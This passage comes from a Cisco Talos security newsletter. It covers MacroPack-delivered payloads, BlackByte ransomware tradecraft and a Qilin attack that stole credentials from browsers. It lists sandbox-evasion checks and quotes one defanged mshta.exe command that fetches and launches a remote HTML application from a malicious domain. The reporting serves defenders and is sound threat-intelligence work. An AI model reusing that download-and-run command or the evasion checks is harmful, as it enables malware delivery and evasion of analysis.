*   The overall disk size is smaller than 60GB.
*   Total memory size is smaller than 1GB.
*   Word Application recent files count is smaller than three.

The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload.

Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads

As we head into the final third of 2024, we caught up with Talos' Nick Biasini to ask him about the biggest shifts and trends in the threat landscape so far. Turns out, he has two major areas of concern.

Hello Talos followers. I’m back for my annual takeover of the Threat Source newsletter. First, an update on that killer sloth movie I was so excited about in August 2023. “Slotherhouse” debuted with an impressive $137,133 at the box office, with critics hailing its various set pieces such as “death by sleeping bag balcony trap” (read that again) and “a particularly gruesome use of hair straighteners.” 

Onto less grisly fare. In the times when I used to frequent the site formerly known as Twitter, my favorite account to follow was “Sorkinese” – a daily elocution safari with the wit and wisdom of Aaron Sorkin characters (mainly from The West Wing). Before Sorkinese’s well timed final tweet in July last year (“The internet people have gone crazy!”) one piece of Sorkin dialogue that I always enjoyed seeing on the feed was “What kind of day has it been?.” The Wingnuts amongst you will know that Sorkin used this as the title of key episodes in several of his shows. It’s meant to signal the end of something, and a reflection of what’s important.  

As summer is drawing to a close and “sweater weather” begins again in earnest, I wanted to use this opportunity to reflect a little…what kind of summer has it been? 

I live in the UK, so “wet” is the first word that comes to mind. But since I allegedly work in the security industry, and this is allegedly a security newsletter, I’ll steer things in that direction. In a "here's what I made earlier" moment (hello to the small percentage of Brits who will get that reference), this is a video which features Talos’ Head of Outreach Nick Biasini. We asked him to reflect on his two biggest areas of concern/importance in the threat landscape right now:

**The one big thing **

 BlackByte is a ransomware-as-a-service (RaaS) group believed to be an offshoot of the infamous Conti ransomware group. They have continued to leverage tactics, techniques and procedures (TTPs) that have formed the foundation of its tradecraft since its inception, continuously iterating its use of vulnerable drivers to bypass security protections and deploying a self-propagating, wormable ransomware encryptor. In recent investigations, Cisco Talos Incident Response (Talos IR) has also observed BlackByte using techniques that depart from their established tradecraft. Members of the team, in collaboration with Talos Intelligence and Interdiction, wrote a blog detailing their findings. 

** Why do I care? **

 During an investigation of a recent BlackByte attack, Talos IR and Talos threat intelligence personnel noted close similarities between indicators of compromise (IOCs) discovered during the investigation and other events flagged in Talos’ global telemetry. Further investigation of these similarities provided additional insights into BlackByte’s current tradecraft and revealed that the group has been significantly more active than would appear from the number of victims published on its data leak site. 

**So now what? **

 Talos IR has provided a full set of recommendations to help defenders protect against RAAS groups such as BlackByte. Including how to detect lateral movement. You’ll find these recommendations in the blog, alongside the MITRE ATT&CK mapping of new TTPs, and Indicators of Compromise.

*   A recent Qilin ransomware attack targeted credentials that were stored in Google Chrome browsers on a portion of the impacted network’s endpoints. Researchers said the move is an “unusual tactic, and one that could be a bonus multiplier for the chaos already inherent in ransomware situations.” Decipher
